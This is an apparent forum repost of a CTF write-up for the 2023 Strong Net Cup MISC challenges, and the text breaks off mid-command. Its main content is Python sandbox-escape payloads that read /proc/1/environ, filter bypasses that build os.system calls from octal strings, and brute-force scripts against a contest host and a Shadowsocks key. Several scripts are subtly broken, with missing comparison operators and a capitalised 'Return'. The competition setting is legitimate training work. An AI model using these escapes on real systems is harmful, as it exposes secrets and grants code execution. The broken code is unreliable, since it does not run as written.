Jump to content

Title: The 7th Strong Net Cup Preliminary Competition in 2023 WP

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

MISC

easyfuzz

1. By trying to enter a string, it is determined that the program's verification rules for input characters are 9 characters, and as long as the correct characters are satisfied, the last return values are all 1111111111, you can get flag

1049983-20231220102232383-2117306380.jpg Continue to guess boldly and try, and find that the first two characters can be any character, which satisfies 110000000, so the last seven characters can be destroyed.

1049983-20231220102232956-1570359645.png

2. Blast bit by bit, verify that the idea is correct, the last bit is the string 'd'

1049983-20231220102233640-77832507.png3. Write a burst script. When the string length is 9 bits and is input, it will be printed with the result that is not "Here is your code coverage: 110000000". The script is as follows

from pwn import *

from string import printable

conn=remote('101.200.122.251', 12199)

non_matching_strings=[]

for i in range(9):

for char in printable:

payload='a'*i + char + 'a'*(8-i)

print(conn.recvuntil(b'Enter a string (should be less than 10 bytes):'))

conn.sendline(payload.encode())

response=conn.recvline().decode().strip()

if response !='Here is your code coverage: 110000000':

non_matching_strings.append(payload)

for string in non_matching_strings:

print(string)

FLAG: qwb{YouKnowHowToFuzz!}

Sign in

flag{welcome_to_qwb_2023}

Pyjail ! It's myFILTER !!!

Python sandbox escapes, after closing, open directly reads environment to get flag

{13212}'+(print(open('/proc/1/environ').read()))+'

Or use payload:

{print(open('/proc/1/environ').read())}

1049983-20231220102234429-840188246.jpg 1049983-20231220102235091-904152452.jpgflag{61e81b4f-566c-49f5-84dd-d79319fddc82}

Pyjail ! It's myRevenge !!!

Python sandbox escape

Write file import os;os.system("nl fl*hzy") and then use read to read the execution content to get flag

All filter characters are bypassed in octal and written in segments

{13212}'+(open('wsy', 'a').write('151155160157162'))+'{13212}'+(open('wsy', 'a').write('t 157'))+'{13212}'+(open('wsy', 'a').write('163;157'))+'{13212}'+(open('wsy', 'a').write('163.'))+'{13212}'+(open('wsy', 'a').write('163y'))+'{13212}'+(open('wsy', 'a').write('st'))+'{13212}'+(open('wsy', 'a').write('em('nl 146*hzy')'))+'{13212}'+open('143157de.py','w').write(open('wsy').read())+'{13212}'+(print(open('hzy').read()))+'

Or execute the following poc: in turn

{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#

{globals().update(dict(len=lambda x:0))}''{in''put()}'#

{print(''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['__builtins__']['__import__']('os').listdir())}

['flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104', 'server_8F6C72124774022B.py']

{globals().update(dict(my_filter=lambda x:1))}''{in' 'put()}'#

{globals(). update(dict(len=lambda x:0))}''{in' 'put()}'#

{print (open('flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104'). read())}

1049983-20231220102235740-1742558554.jpg

flag{8f0a4ac2-52d3-4adb-a1a3-47e05997817d}

Wabby Wabbo Radio

f12 can get the link to wav/static/audios/xh4.wav

1049983-20231220102236427-57165101.jpg Refreshed it and found that it was randomly selected to play.

Fuzzed it and there are a total of xh1-xh5 and hint1-hint2 and flag.wav

The left vocal of each wav is obviously Moss

1049983-20231220102237104-943477565.jpg

Separate channel, increase amplitude, explain it online website

https://morsecode.world/international/decoder/audio-decoder-adaptive.html

get:

Do you want a flag? Let's listen a little longer.Genshin Impact starts.The weather is really nice today. It's a great day to listen to the Wabby Wabbo radio.If you don't know how to do it, you can go ahead and do something else first.may be flag is png picturedo you know QAM?

Nothing else is useful, just one prompts the QAM carrier amplitude

https://info.support.huawei.com/info-finder/encyclopedia/zh/QAM.html#Qam's horoscope

After a brief understanding, I found that 01 can be distinguished by amplitude. I tried to print the amplitude and found that they all happened to be concentrated between ±1 and ±3.

1049983-20231220102237866-1291932793.jpg Comparing the 16QAM constellation chart, we can find that amplitudes can just form a signal correspondence, but we don’t know what the specific correspondence is. We just blindly guess from small to large.

The simple script is as follows:

import scipy.io.wavfile as wav

import numpy as np

import sys

sample_rate, data=wav.read('flag.wav')

for i in data:

print(i)

flag=''

def repla(n):

if n==-3:

return '00'

elif n==-1:

return '01'

elif n==1:

return '10'

elif n==3:

return '11'

for x, y in data:

n1=round(float(x))

n2=round(float(y))

flag +=repla(n1)

flag +=repla(n2)

print(flag)

1049983-20231220102238733-2090115571.jpg

Spy Shadows 3.0

Give hint: paper airplane is also an airplane, and can also fly abroad to the other side of the ocean. According to the description of the topic, it is easy to associate the special tunnel as a vpn

A little search will lead to Shadowsks, reference article:

https://phuker.github.io/posts/Shadowsks-active-probing.html

The complete decryption script was given, but I don't know the key, so I just exploded it and used HTTP as the identifier for the successful request.

#!/usr/bin/env python3

# encoding: utf-8

import os

import sys

import logging

import hashlib

from Crypto.Cipher import AES

logging.basicConfig(level=logging.INFO)

def EVP_BytesToKey(password, key_len, iv_len):

m=[]

i=0

while len(b''.join(m)) (key_len + iv_len):

md5=hashlib.md5()

data=password

if i 0:

data=m[i - 1] + password

md5.update(data)

m.append(md5.digest())

i +=1

ms=b''.join(m)

key=ms[:key_len]

iv=ms[key_len:key_len + iv_len]

return key, iv

def decrypt(cipher, password):

key_len=int(256/8)

iv_len=16

mode=AES.MODE_CFB

key, _=EVP_BytesToKey(password, key_len, iv_len)

cipher=bytes.fromhex(cipher)

iv=cipher[:iv_len]

real_cipher=cipher[iv_len:]

obj=AES.new(key, mode, iv, segment_size=128)

plain=obj.decrypt(real_cipher)

Return plain

def main():

# test http request

cipher='e0a77dfafb6948728ef45033116b34fc855e7ac8570caed829ca9b4c32c2f6f79184e333445c6027e18a6b53253dca03c6c464b8289cb7a16aa1766e6a0325ee842f9a766b81039fe50c5da12dfaa89eacce17b1 1ba9748899b49b071851040245fa5ea1312180def3d7c0f5af6973433544a8a342e8fcd2b1759086ead124e39a8b3e2f6dc5d56ad7e8548569eae98ec363f87930d4af80e984d0103036a91be4ad76f0cfb00206'

with open('rockyou.txt','rb') as f:

lines=f.readlines()

for password in lines:

plain=decrypt(cipher,password.strip())

if b'HTTP' in plain:

print(password,plain)

if __name__=='__main__':

main()

#b'superman\n' b'\x03\x0f192.168.159.131\x00PGET /Why-do-you-want-to-know-what-this-is HTTP/1.1\r\nHost: 192.168.159.131\r\nUser-Agent: curl/8.4.0\r\nAccept: */*\r\nConnection: close\r\n\r\n'

Get the file name Why-do-you-want-to-know-what-this-is, and get flag after md5

flag{dc7e57298e65949102c17596f1934a97}

Spy Shadows 2.0

According to the topic description, aircraft traffic can be easily associated with the ADS-B protocol

Export tcp stream data

tshark -r attach.pcapng -Y 'tcp' -T fields -e tcp.segment_data tcp.txt

Parsing script:

import pyModeS

with open('tcp.txt','r')as f:

lines=f.readlines()

for data in lines:

if len(data)==47:

print(pyModeS.decoder.tell(data[18:]))

Filter Airborne velocity and get the fastest airplane of 79a05e is 371 knots, and the md5 ICAO address is flag

1049983-20231220102239481-10217306.jpg or

Export packets to json format

1049983-20231220102240331-759824562.png

Extract fields using script and do MD5

import json

import pyModeS as pms

import hashlib

with open('123.json', 'r', encoding='utf-8') as file:

data=json.load(file)

info=[]

for packet in data:

if 'layers' in packet['_source'] and 'tcp' in packet['_source']['layers']:

tcp_layer=packet['_source']['layers']['tcp']

if 'tcp.payload' in tcp_layer:

tcp_payload=tcp_layer['tcp.payload'].replace(':','')

info.append(tcp_payload)

planes_data=[]

for i in info:

msg=i[18:]

if pms.adsb.typecode(msg)=19 and pms.adsb.typecode(msg)=22:

icao=pms.adsb.icao(msg)

velocity_info=pms.adsb.velocity(msg)

speed, track, vertical_rate, _=velocity_info

plane_info={'icao': icao, 'speed': speed, 'track': track, 'vertical_rate': vertical_rate}

planes_data.append(plane_info)

fastest_plane=max(planes_data, key=lambda x: x['speed'])

print(hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest())

#flag{4cf6729b9bc05686a79c1620b0b1967b}

happy chess

It should be unexpected. Enter 9 positions at any time and exit the round directly. It will be considered successful.

1049983-20231220102241092-1866057286.jpg

Strong Net Pioneer

speedup

Pure social work problem, requires the sum of factorials to the power of 27, and there is this value directly on OEIS

https://oeis.org/A244060/list

2023 强网杯 writeup by Arr3stY0u

After sha256, get flag

flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}

Have you found the PNG?

strings main.mem | grep 'Linux version'

1049983-20231220102242746-1827208583.jpg After getting the kernel version, take a photo

https://treasure-house.randark.site/blog/2023-10-25-MemoryForensic-Test/

Make a Linux profile

python2 vol.py -f C:Users22826Desktopmain.mem --profile=LinuxUbuntu2004x64 linux_find_file -L | findstr 'Desktop'

You can find a file on the desktop have_your_fun.jocker

1049983-20231220102243633-2077410566.jpg Tried to export, but empty

python2 vol.py -f C:Users22826Desktopmain.mem --profile=Linux

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.